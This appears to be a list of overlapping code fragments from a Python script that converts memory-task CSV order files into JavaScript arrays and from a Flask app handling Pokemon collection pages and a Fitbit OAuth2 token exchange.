"cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1])",
"glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\"))",
"for fname in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as",
"corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close()",
"for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}', lbin: {2},",
"outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with",
"coding: utf-8 -*- \"\"\" Created on Wed Apr 1 17:05:31 2020 @author: craig",
"This converts those actual .csv files into the .js ones we'll be using",
"corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {'",
"lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2')",
"files into the .js ones we'll be using here \"\"\" import os, csv,",
"studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in",
"< (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname) stim=[]",
"corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in",
"Created on Wed Apr 1 17:05:31 2020 @author: craig We've been using some",
"- University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname)",
"open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath)",
"utf-8 -*- \"\"\" Created on Wed Apr 1 17:05:31 2020 @author: craig We've",
"elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for",
"we'll be using here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive",
"the .js ones we'll be using here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared",
"studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as infile:",
"outfile.write(' {' + \"stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i])",
"University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[]",
"row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1')",
"as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\")",
"in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2')",
"trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}', lbin:",
"corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0])",
"{3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n')",
"{2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else:",
"using here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University",
"2020 @author: craig We've been using some online order files in our original",
"if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles:",
"os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\")",
".csv files into the .js ones we'll be using here \"\"\" import os,",
"next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for",
"\"\"\" Created on Wed Apr 1 17:05:31 2020 @author: craig We've been using",
"print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for",
"outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}',",
"as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v':",
"with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2])",
"# -*- coding: utf-8 -*- \"\"\" Created on Wed Apr 1 17:05:31 2020",
"\"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California",
"outfile.close() for fname in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\")",
"web-based MST. This converts those actual .csv files into the .js ones we'll",
"outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname) stim=[] cond=[] lbin=[]",
"corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var",
"outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles:",
"inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for",
"print(fname) stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader:",
"cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in",
"corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)):",
"row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in",
"row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\")",
"-*- coding: utf-8 -*- \"\"\" Created on Wed Apr 1 17:05:31 2020 @author:",
"stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row",
"i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname)",
"-*- \"\"\" Created on Wed Apr 1 17:05:31 2020 @author: craig We've been",
"been using some online order files in our original PsychoPy-derived web-based MST. This",
"original PsychoPy-derived web-based MST. This converts those actual .csv files into the .js",
"those actual .csv files into the .js ones we'll be using here \"\"\"",
"cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i <",
"csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\"))",
"@author: craig We've been using some online order files in our original PsychoPy-derived",
"+ '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname",
"cond: '{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close()",
"else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[]",
"on Wed Apr 1 17:05:31 2020 @author: craig We've been using some online",
"California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[] cond=[] with",
"cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' +",
"in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i",
"for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i",
"corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n')",
"corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' +",
"ones we'll be using here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders')",
"lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n')",
"for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b':",
"stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n':",
"testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader)",
"next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif",
"i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}', lbin: {2}, corr3:",
"cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2')",
"corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close()",
"outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}',",
"corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1])",
"{' + \"stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) +",
"i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if",
"craig We've been using some online order files in our original PsychoPy-derived web-based",
"<filename>misc/ConvertOrdersCSVtoJS.py # -*- coding: utf-8 -*- \"\"\" Created on Wed Apr 1 17:05:31",
"+ \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else:",
"outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1):",
"reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0')",
"reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write('",
"PsychoPy-derived web-based MST. This converts those actual .csv files into the .js ones",
"MST. This converts those actual .csv files into the .js ones we'll be",
"converts those actual .csv files into the .js ones we'll be using here",
"'{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n')",
"row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1')",
"lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader:",
"files in our original PsychoPy-derived web-based MST. This converts those actual .csv files",
"- Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\")",
"corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1')",
"(len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname) stim=[] cond=[]",
"outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[]",
"in our original PsychoPy-derived web-based MST. This converts those actual .csv files into",
"\"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n')",
"with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close()",
"stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {'",
"be using here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive -",
"drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname",
"Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in",
"for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}')",
"Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as",
"'{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for",
"reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif",
"our original PsychoPy-derived web-based MST. This converts those actual .csv files into the",
"{' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n')",
"outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond:"
] |
[
"the actual access token token = requests.post('https://api.fitbit.com/oauth2/token', headers=auth_header, params=post_params).json() LOGGER.debug(token) # for some",
"= (base64.encodebytes(bytes(id_secret, 'utf8')) .decode('utf8') .rstrip()) auth_header = {'Authorization': f'Basic {b64_creds}', 'Content-Type': 'application/x-www-form-urlencoded'} post_params",
".rstrip()) auth_header = {'Authorization': f'Basic {b64_creds}', 'Content-Type': 'application/x-www-form-urlencoded'} post_params = {'grant_type': 'authorization_code', 'code':",
"render_template, request, session from requests_oauthlib import OAuth2Session from poketrainer.app import flask_app from poketrainer.api.syncs.fitbit",
"requests from flask import redirect, render_template, request, session from requests_oauthlib import OAuth2Session from",
"flask import redirect, render_template, request, session from requests_oauthlib import OAuth2Session from poketrainer.app import",
"'api/team').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/fitbit_login/') def fitbit_login(): return _generate_fitbit_token() @flask_app.route('/fitbitCallback') def fitbit_callback(): id_secret",
"for why we have to do this base64 stuff b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8'))",
"'application/x-www-form-urlencoded'} post_params = {'grant_type': 'authorization_code', 'code': request.args.get('code'), 'redirect_uri': request.host_url + FITBIT_CALLBACK_URI} # request",
"\\ FITBIT_CALLBACK_URI LOGGER = logging.getLogger(__name__) @flask_app.route('/ui/collection/') def collection(): pokemon = requests.get(request.host_url + 'api/collection').json()",
"# request the actual access token token = requests.post('https://api.fitbit.com/oauth2/token', headers=auth_header, params=post_params).json() LOGGER.debug(token) #",
"actual access token token = requests.post('https://api.fitbit.com/oauth2/token', headers=auth_header, params=post_params).json() LOGGER.debug(token) # for some reason",
"_generate_fitbit_token, \\ FITBIT_CALLBACK_URI LOGGER = logging.getLogger(__name__) @flask_app.route('/ui/collection/') def collection(): pokemon = requests.get(request.host_url +",
"@flask_app.route('/fitbitCallback') def fitbit_callback(): id_secret = (f'{flask_app.config[\"FITBIT_CLIENT_ID\"]}:' f'{flask_app.config[\"FITBIT_CLIENT_SECRET\"]}') # see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa #",
"session from requests_oauthlib import OAuth2Session from poketrainer.app import flask_app from poketrainer.api.syncs.fitbit import _generate_fitbit_token,",
"pokemon = requests.get(request.host_url + 'api/collection').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/ui/team/') def team(): pokemon =",
"render_template('collection.html', pokemon=pokemon) @flask_app.route('/fitbit_login/') def fitbit_login(): return _generate_fitbit_token() @flask_app.route('/fitbitCallback') def fitbit_callback(): id_secret = (f'{flask_app.config[\"FITBIT_CLIENT_ID\"]}:'",
"@flask_app.route('/fitbit_login/') def fitbit_login(): return _generate_fitbit_token() @flask_app.route('/fitbitCallback') def fitbit_callback(): id_secret = (f'{flask_app.config[\"FITBIT_CLIENT_ID\"]}:' f'{flask_app.config[\"FITBIT_CLIENT_SECRET\"]}') #",
"https://github.com/requests/requests-oauthlib/issues/324 # oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'], # redirect_uri=request.host_url + '/fitbitCallback/', # scope=['activity']) # token",
"OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'], # redirect_uri=request.host_url + '/fitbitCallback/', # scope=['activity']) # token = oauth.fetch_token( # token_url='https://api.fitbit.com/oauth2/token',",
"{'Authorization': f'Basic {b64_creds}', 'Content-Type': 'application/x-www-form-urlencoded'} post_params = {'grant_type': 'authorization_code', 'code': request.args.get('code'), 'redirect_uri': request.host_url",
"+ '/fitbitCallback/', # scope=['activity']) # token = oauth.fetch_token( # token_url='https://api.fitbit.com/oauth2/token', # authorization_response=request.url, #",
"= oauth.fetch_token( # token_url='https://api.fitbit.com/oauth2/token', # authorization_response=request.url, # include_client_id=True, # client_secret=flask_app.config['FITBIT_CLIENT_SECRET']) session.update( FITBIT_REFRESH_TOKEN=token['refresh_token']) return",
"noqa # for why we have to do this base64 stuff b64_creds =",
"from requests_oauthlib import OAuth2Session from poketrainer.app import flask_app from poketrainer.api.syncs.fitbit import _generate_fitbit_token, \\",
"params=post_params).json() LOGGER.debug(token) # for some reason this fails with 'Missing access token' #",
"access token' # c.f. https://github.com/requests/requests-oauthlib/issues/324 # oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'], # redirect_uri=request.host_url + '/fitbitCallback/',",
"= {'Authorization': f'Basic {b64_creds}', 'Content-Type': 'application/x-www-form-urlencoded'} post_params = {'grant_type': 'authorization_code', 'code': request.args.get('code'), 'redirect_uri':",
"= requests.get(request.host_url + 'api/team').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/fitbit_login/') def fitbit_login(): return _generate_fitbit_token() @flask_app.route('/fitbitCallback')",
"some reason this fails with 'Missing access token' # c.f. https://github.com/requests/requests-oauthlib/issues/324 # oauth",
"import redirect, render_template, request, session from requests_oauthlib import OAuth2Session from poketrainer.app import flask_app",
"= OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'], # redirect_uri=request.host_url + '/fitbitCallback/', # scope=['activity']) # token = oauth.fetch_token( #",
"def fitbit_login(): return _generate_fitbit_token() @flask_app.route('/fitbitCallback') def fitbit_callback(): id_secret = (f'{flask_app.config[\"FITBIT_CLIENT_ID\"]}:' f'{flask_app.config[\"FITBIT_CLIENT_SECRET\"]}') # see",
"# for why we have to do this base64 stuff b64_creds = (base64.encodebytes(bytes(id_secret,",
".decode('utf8') .rstrip()) auth_header = {'Authorization': f'Basic {b64_creds}', 'Content-Type': 'application/x-www-form-urlencoded'} post_params = {'grant_type': 'authorization_code',",
"# for some reason this fails with 'Missing access token' # c.f. https://github.com/requests/requests-oauthlib/issues/324",
"+ 'api/collection').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/ui/team/') def team(): pokemon = requests.get(request.host_url + 'api/team').json()",
"have to do this base64 stuff b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8')) .decode('utf8') .rstrip()) auth_header",
"fails with 'Missing access token' # c.f. https://github.com/requests/requests-oauthlib/issues/324 # oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'], #",
"f'Basic {b64_creds}', 'Content-Type': 'application/x-www-form-urlencoded'} post_params = {'grant_type': 'authorization_code', 'code': request.args.get('code'), 'redirect_uri': request.host_url +",
"headers=auth_header, params=post_params).json() LOGGER.debug(token) # for some reason this fails with 'Missing access token'",
"requests.post('https://api.fitbit.com/oauth2/token', headers=auth_header, params=post_params).json() LOGGER.debug(token) # for some reason this fails with 'Missing access",
"{b64_creds}', 'Content-Type': 'application/x-www-form-urlencoded'} post_params = {'grant_type': 'authorization_code', 'code': request.args.get('code'), 'redirect_uri': request.host_url + FITBIT_CALLBACK_URI}",
"poketrainer.api.syncs.fitbit import _generate_fitbit_token, \\ FITBIT_CALLBACK_URI LOGGER = logging.getLogger(__name__) @flask_app.route('/ui/collection/') def collection(): pokemon =",
"requests.get(request.host_url + 'api/team').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/fitbit_login/') def fitbit_login(): return _generate_fitbit_token() @flask_app.route('/fitbitCallback') def",
"base64 import logging import requests from flask import redirect, render_template, request, session from",
"OAuth2Session from poketrainer.app import flask_app from poketrainer.api.syncs.fitbit import _generate_fitbit_token, \\ FITBIT_CALLBACK_URI LOGGER =",
"token token = requests.post('https://api.fitbit.com/oauth2/token', headers=auth_header, params=post_params).json() LOGGER.debug(token) # for some reason this fails",
"# see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa # for why we have to do this",
"= requests.get(request.host_url + 'api/collection').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/ui/team/') def team(): pokemon = requests.get(request.host_url",
"'Missing access token' # c.f. https://github.com/requests/requests-oauthlib/issues/324 # oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'], # redirect_uri=request.host_url +",
"return render_template('collection.html', pokemon=pokemon) @flask_app.route('/ui/team/') def team(): pokemon = requests.get(request.host_url + 'api/team').json() return render_template('collection.html',",
"request the actual access token token = requests.post('https://api.fitbit.com/oauth2/token', headers=auth_header, params=post_params).json() LOGGER.debug(token) # for",
"pokemon=pokemon) @flask_app.route('/ui/team/') def team(): pokemon = requests.get(request.host_url + 'api/team').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/fitbit_login/')",
"'/fitbitCallback/', # scope=['activity']) # token = oauth.fetch_token( # token_url='https://api.fitbit.com/oauth2/token', # authorization_response=request.url, # include_client_id=True,",
"logging.getLogger(__name__) @flask_app.route('/ui/collection/') def collection(): pokemon = requests.get(request.host_url + 'api/collection').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/ui/team/')",
"import base64 import logging import requests from flask import redirect, render_template, request, session",
"redirect, render_template, request, session from requests_oauthlib import OAuth2Session from poketrainer.app import flask_app from",
"@flask_app.route('/ui/team/') def team(): pokemon = requests.get(request.host_url + 'api/team').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/fitbit_login/') def",
"https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa # for why we have to do this base64 stuff",
"FITBIT_CALLBACK_URI} # request the actual access token token = requests.post('https://api.fitbit.com/oauth2/token', headers=auth_header, params=post_params).json() LOGGER.debug(token)",
"import OAuth2Session from poketrainer.app import flask_app from poketrainer.api.syncs.fitbit import _generate_fitbit_token, \\ FITBIT_CALLBACK_URI LOGGER",
"from poketrainer.app import flask_app from poketrainer.api.syncs.fitbit import _generate_fitbit_token, \\ FITBIT_CALLBACK_URI LOGGER = logging.getLogger(__name__)",
"post_params = {'grant_type': 'authorization_code', 'code': request.args.get('code'), 'redirect_uri': request.host_url + FITBIT_CALLBACK_URI} # request the",
"oauth.fetch_token( # token_url='https://api.fitbit.com/oauth2/token', # authorization_response=request.url, # include_client_id=True, # client_secret=flask_app.config['FITBIT_CLIENT_SECRET']) session.update( FITBIT_REFRESH_TOKEN=token['refresh_token']) return redirect('/ui/collection/')",
"access token token = requests.post('https://api.fitbit.com/oauth2/token', headers=auth_header, params=post_params).json() LOGGER.debug(token) # for some reason this",
"pokemon = requests.get(request.host_url + 'api/team').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/fitbit_login/') def fitbit_login(): return _generate_fitbit_token()",
